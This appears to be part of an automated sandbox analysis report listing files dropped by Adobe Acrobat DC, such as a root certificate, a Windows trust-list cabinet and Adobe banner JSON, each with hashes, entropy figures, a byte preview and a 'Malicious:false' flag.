                                                                                                        MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                                        SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                                        SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                                        SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                                        Malicious:false
                                                                                                        Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                        Category:dropped
                                                                                                        Size (bytes):71954
                                                                                                        Entropy (8bit):7.996617769952133
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                        Malicious:false
                                                                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):192
                                                                                                        Entropy (8bit):2.7895108629891827
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:kkFklABKb31fllXlE/HT8k6hlXNNX8RolJuRdxLlGB9lQRYwpDdt:kKZBLT8lzdNMa8RdWBwRd
                                                                                                        MD5:F6C65E5D845351918D926BBDDC2571ED
                                                                                                        SHA1:B7EC13D408C4DA804A7D3B05DAE8E154CAC98BCA
                                                                                                        SHA-256:5161C302EFDE35D8521EF1C27C6917DA9180DFED695CC600E03D121CC2D13405
                                                                                                        SHA-512:5D15E69CB5A472A5067EBFCBB4AFC742C400D69839D9AEAAC291DDF5E3566AEFE7B66ABA9DF58DF0041382B3BEA4C93E80EDB616CCE486CEEFCFC49420B4B107
                                                                                                        Malicious:false
                                                                                                        Preview:p...... ........3.&....(....................................................... ..........W.....;..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:modified
                                                                                                        Size (bytes):328
                                                                                                        Entropy (8bit):3.245596380966818
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:kK5n9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:B2DImsLNkPlE99SNxAhUe/3
                                                                                                        MD5:9991799E5ABB02FCF3DB3E0EA9DFB017
                                                                                                        SHA1:2B5A609520AB8BA1B40F714E28C9FB5A4514DB49
                                                                                                        SHA-256:C6B05C9CABA1A949021F7C340BE8E9FA038386FCB3E1F83E9B31B77247853340
                                                                                                        SHA-512:A0EB99254922789C95A11CF27148618E3ACCCD35478EBF7C60F3FA6AEF210B65AEBB9078D7E5B3CABCC8EB5EB39F7B8E3A8EABDFFE32C41901C429FD4A290CFE
                                                                                                        Malicious:false
                                                                                                        Preview:p...... ..........J....(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):295
                                                                                                        Entropy (8bit):5.303051319641115
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HX6Q8kAEJK7+FIbRI6XVW7+0YGB69SKoAvJM3g98kUwPeUkwRe9:YvXKX6QNvEyYpW76CGMbLUkee9
                                                                                                        MD5:3E3D400AD17C41ECA4D4B15F84350C2D
                                                                                                        SHA1:5BDE8A126DC22303DE235D73057A3D091B0BEA4A
                                                                                                        SHA-256:E961ACCB01F17927C66275621065879CFCD8C304F2CB49E932BD79F1EC3C013D
                                                                                                        SHA-512:8FCBBA206B22AC5A23862137789AC37F8AFF9698FDD7C90733BF3EE5D3CFEDE8511DA1B5DCCF50B41EF11DA9678C08BB1853E7D0DE04B120657648A9D5A9F47D
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"940d52b1-4d92-4100-9eae-98c6c6700101","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1728519701021,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):294
                                                                                                        Entropy (8bit):5.243117113787433
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HX6Q8kAEJK7+FIbRI6XVW7+0YGB69SKoAvJfBoTfXpnrPeUkwRe9:YvXKX6QNvEyYpW76CGWTfXcUkee9
                                                                                                        MD5:773724207D4DDA346322DA6C841F732E
                                                                                                        SHA1:D8C339BBDB93E58DB15AEE777E04E2E0FDFACDD5
                                                                                                        SHA-256:BEE45B3D55EAA81AB4C34B993F8EA2B7F3EF7D33751EE443AE8D4DC2E816BD85
                                                                                                        SHA-512:805B3831D770D3CECBA2A7E617B0A13768F758353BB93B230F3F518CEF3DF1DC42F0489C228692A4BCBC9FF7540F7B44728CF07BFA527D1DF914CD1CA0E843F2
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"940d52b1-4d92-4100-9eae-98c6c6700101","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1728519701021,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):294
                                                                                                        Entropy (8bit):5.221665430313438
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HX6Q8kAEJK7+FIbRI6XVW7+0YGB69SKoAvJfBD2G6UpnrPeUkwRe9:YvXKX6QNvEyYpW76CGR22cUkee9
                                                                                                        MD5:CB8EA396A8FD6C1B5E4D0B41BAF2FB8F
                                                                                                        SHA1:5375C7127FF9B3A275978B7896B572A87AB82E9E
                                                                                                        SHA-256:126D1A24EC3128676AB448B06D43D6F9277B3619B563807DD968E255784F5821
                                                                                                        SHA-512:E9F61F2268B9464896EF4CDD6F47EE393C4A884079E6984E90779B4138E5FF39D33C970EA8F79589A5F6D1FF8B2405D1D82FFD57809348DDF8308941623E58CC
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"940d52b1-4d92-4100-9eae-98c6c6700101","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1728519701021,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):285
                                                                                                        Entropy (8bit):5.279827984429224
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HX6Q8kAEJK7+FIbRI6XVW7+0YGB69SKoAvJfPmwrPeUkwRe9:YvXKX6QNvEyYpW76CGH56Ukee9
                                                                                                        MD5:D06E393B616E7639B632777785981A14
                                                                                                        SHA1:633171A90A38A38FC527502379457EB6D52081AD
                                                                                                        SHA-256:76F06B30047615BF3D6A9259F4F8F69F6FF1CB8156AD985EA093E9B99327F949
                                                                                                        SHA-512:179E9A1749D4695E3B53853051B5A7A79A10D5228ABA48C4788F8F42B063693BBAA65A614386606CF14C676C17ADD97EE3FEE92E5F0CF1A5C944C01BC2091A4E
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"940d52b1-4d92-4100-9eae-98c6c6700101","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1728519701021,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1083
                                                                                                        Entropy (8bit):5.672829270974223
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Yv6XqXiepLgE6c3UDx7nnl0RCmK8czOCY4wgSd:Yv3yehg1JaAh8cvYvFd
                                                                                                        MD5:12EBB997DB80DB3BB5B2AD34FFBB4BEB
                                                                                                        SHA1:9B215B0E37A97702A5029F3A8259FDD570320C10
                                                                                                        SHA-256:5B6B9FED769CBF63D82C1D353E2F2F8A8824F3E31EC1CE79EE4CEA0A579E9429
                                                                                                        SHA-512:A915D004FBE98AACB0DA790CA14928424E9AD92CF616D738D9F781842DFF5268A4014A5B01BE46E0AEF135150948DE767FC65303D1A19593BC036B01668F6E27
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"940d52b1-4d92-4100-9eae-98c6c6700101","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1728519701021,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"89628_277808ActionBlock_2","campaignId":89628,"containerId":"1","controlGroupId":"","treatmentId":"22b145c0-22bc-4bba-811f-7234f288595b","variationId":"277808"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQgZmlsZXMgdG8gYW5kIGZyb20gUERGXG53aXRob3V0IGxpbWl0cy4ifSwidGNhdElkIjoiUkdTMDM1MS1FTlUtQ29udHJvbCJ9","dataType":"applicatio
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1050
                                                                                                        Entropy (8bit):5.643375541346574
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Yv6XqXiIVLgEF0c7sbnl0RCmK8czOCYHflEpwiVc:Yv3yIFg6sGAh8cvYHWpwd
                                                                                                        MD5:E8C29CABEC7E4EBAC68B63D35F1EA15A
                                                                                                        SHA1:CE90BABDC10D06D56FD04EA266E95C8AC45F3D1B
                                                                                                        SHA-256:C5D07741AF5546E250B88F0A578BD24CC10E23DB3C0BD812785440597FC910E7
                                                                                                        SHA-512:299BABA8802D7B69D641F542F5DD1000614A0CA1BD3E002B1E942E239284135CB425042F4D862D46D9AE0944B561FF2DFBB92ED36B432A88AECDF16386314F66
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"940d52b1-4d92-4100-9eae-98c6c6700101","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1728519701021,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_0","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"0924134e-3c59-4f53-b731-add558c56fec","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuZm9ybXMgJiBhZ3JlZW1lbnRzLiJ9LCJ0Y2F0SWQiOm51bGx9","dataType":"application\/json","encodingScheme":true},"
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):292
                                                                                                        Entropy (8bit):5.226755880225475
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HX6Q8kAEJK7+FIbRI6XVW7+0YGB69SKoAvJfQ1rPeUkwRe9:YvXKX6QNvEyYpW76CGY16Ukee9
                                                                                                        MD5:C641EE0A121EBA450D51629F967099FC
                                                                                                        SHA1:F9793D9726D74A7DF1950BA9FDA05FD8ABF1F02A
                                                                                                        SHA-256:6B142D77E6F1602267A385B8C45D2FFEDF58B654A931E1FF45CA13A4076938AD
                                                                                                        SHA-512:07285CFB8852E77682C5A5A7EC25F9121B44E1A2FB1D4596A39FA5C22C242E57DFC8A009C79D1D3894FE767948F0894430AAED2BBCBCF7A59E64DFDDF3CF6B0E
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"940d52b1-4d92-4100-9eae-98c6c6700101","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1728519701021,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1062
                                                                                                        Entropy (8bit):5.682245189159056
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Yv6XqXiN2LgE4cq/S70nl0RCmK8czOCAPtciGSd:Yv3yNog9ohAh8cvA3d
                                                                                                        MD5:FC8D75BC910B6127771D50103E228D91
                                                                                                        SHA1:D5289FC448E6FDA67CD30610A66ACC9B1E686BF2
                                                                                                        SHA-256:0B07D061E23537034F1D00CD9C9501B17C66C8F1D62581FD12F244EE5209B856
                                                                                                        SHA-512:5E06D856B030BD5F92E98DC80494660E38915413D404C18933C13ACAB457392907972FED4F0E5F2063A79C6CB63BB69D932FD4F8384050898532C1CED1E96655
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"940d52b1-4d92-4100-9eae-98c6c6700101","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1728519701021,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"89628_277808ActionBlock_0","campaignId":89628,"containerId":"1","controlGroupId":"","treatmentId":"58886bd3-acd7-4f84-ae2e-6684bc127c41","variationId":"277808"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVkaXQgdGV4dCwgaW1hZ2VzLCBwYWdlcywgYW5kIG1vcmUuIn0sInRjYXRJZCI6IlJHUzAzNTEtRU5VLUNvbnRyb2wifQ==","dataType":"application\/json","encodingSch
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1164
                                                                                                        Entropy (8bit):5.690639942070473
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Yv6XqXilKLgEfIcZVSkpsn264rS514ZjBrwloJTmcVIsrSK5c:Yv3ylEgqprtrS5OZjSlwTmAfSKa
                                                                                                        MD5:16BA81AC2F59DAADD98839EF8C8A6F73
                                                                                                        SHA1:CEA8AAAEA2B3C87234EE6B08ABACAE59C14F59D2
                                                                                                        SHA-256:66FD90F0DD8A05CC394ABCF6D31674ECF1BC3BC903B4DCF53032FD9086180D7A
                                                                                                        SHA-512:88B53B978CD4E9B91C42D53660834BAB5B6B0FE789D377EE3147AFF357CE68F908FE951C0020A47494E995E18577DDA4AD5BFDFB039E616A9F05D2CDDC804D45
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"940d52b1-4d92-4100-9eae-98c6c6700101","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1728519701021,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85531_264848ActionBlock_0","campaignId":85531,"containerId":"1","controlGroupId":"","treatmentId":"ee1a7497-76e7-43c2-bb63-9a0551e11d73","variationId":"264848"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE1cHgiLCJmb250X3N0eWxlIjoiMCJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEzcHgiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0b1xucHJlbWl1bSBQREYgYW5kIGUtc2lnbmluZ1xudG9vbHMuIn0sImJhbm5lcl9zdHlsaW5nIjo
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):289
                                                                                                        Entropy (8bit):5.233296434997502
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HX6Q8kAEJK7+FIbRI6XVW7+0YGB69SKoAvJfYdPeUkwRe9:YvXKX6QNvEyYpW76CGg8Ukee9
                                                                                                        MD5:084B07A55600A40B0BF73A21E936E7DC
                                                                                                        SHA1:6EF4AEA0279CCFDCA1B8D62D9370DD72F8846138
                                                                                                        SHA-256:835344E447B3C7872FCD5FF26860271906868B9B4E99B223F48F022697766AEF
                                                                                                        SHA-512:A43E4437C81005C693B890D1B3588752D0A9459D51271C5B639DE4C09FCCCFB11E6C2938C53426A8783D4E80553636B9D18BF5387E997A181184506479142BBF
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"940d52b1-4d92-4100-9eae-98c6c6700101","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1728519701021,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1395
                                                                                                        Entropy (8bit):5.76674178472352
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Yv6XqXiYrLgEGOc93W2JeFmaR7CQzttgBcu141CjrWpHfRzVCV9FJNr:Yv3yYHgDv3W2aYQfgB5OUupHrQ9FJl
                                                                                                        MD5:DB6275E337275D81A5AD238E41EDACD6
                                                                                                        SHA1:C66DD304ADF619FDF7CB15818A2EB7726858C54D
                                                                                                        SHA-256:6BBA58ECCEA11A4BBDB1E04CCBF3BD89BA1123844399C689EE7FE4455FC342AB
                                                                                                        SHA-512:2E7179275FBFA3EAC916EC01ED83B21C5C2E43B41FBB8E9098B244AD6489107D0E437E720DBD780E97BF640EF0842FA963BA21391B3F4AB86478A9F4B74D6E2A
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"940d52b1-4d92-4100-9eae-98c6c6700101","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1728519701021,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):291
                                                                                                        Entropy (8bit):5.217301976417087
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HX6Q8kAEJK7+FIbRI6XVW7+0YGB69SKoAvJfbPtdPeUkwRe9:YvXKX6QNvEyYpW76CGDV8Ukee9
                                                                                                        MD5:64EEB432CA1B55FAC036EAA4AF3EAEEE
                                                                                                        SHA1:64596FF87F040BE543D16866449140BE73C9FE5C
                                                                                                        SHA-256:5FACD2D7FD7E0BC2F576B3CF8748760778AF0ACE5C7EBFD4693A04F4C6531471
                                                                                                        SHA-512:84DF8AA239866099116349209EB8087B67501EC830AC85D0A6404A44FDE1AD9FE750D14253CC88345FE9A0088F671D588453282D9AC27F3A128F15A1428D0C1A
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"940d52b1-4d92-4100-9eae-98c6c6700101","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1728519701021,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):287
                                                                                                        Entropy (8bit):5.217737538138038
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HX6Q8kAEJK7+FIbRI6XVW7+0YGB69SKoAvJf21rPeUkwRe9:YvXKX6QNvEyYpW76CG+16Ukee9
                                                                                                        MD5:777E603F709D4BF47C299BC649D91006
                                                                                                        SHA1:79A1C3D056CFE74B12199038FB8E8C4BEA0C6519
                                                                                                        SHA-256:3D232EF02BEE51578732D2B6C123323E846B438EFF22A03076C1F90EFE1310D0
                                                                                                        SHA-512:AE31A732347C0FE0685B254D259B58561300F9AF991A94005B187E7F79F647EC8D01B5926E3FA2F0B6ADF0D74189568ABCC27AF9CF7DE8E45A00C413E965A65F
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"940d52b1-4d92-4100-9eae-98c6c6700101","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1728519701021,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1082
                                                                                                        Entropy (8bit):5.67639357601695
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Yv6XqXiCamXayLgE7c9O47Naqnl0RCmK8czOC+w2E+tg8GSd:Yv3ycBgZNOAh8cv+NKMd
                                                                                                        MD5:47A351454EAAB771273327FFB70CA7B0
                                                                                                        SHA1:87BAD0FF6E20D7A7745E9AA09F3B93F8D01DB41D
                                                                                                        SHA-256:73B2481C8B57F8CF4282D5D086270050F90A2F254444DE778B28F96CB67E7BC1
                                                                                                        SHA-512:768D939628438E98BB43397A98E023EF8B1FA408EF88B42091C79551C8E6C9FC4457C7251ABEB2530E1A1DE8E02E79052F1E661C562CECE9B595525E12A142C5
                                                                                                        Malicious:false
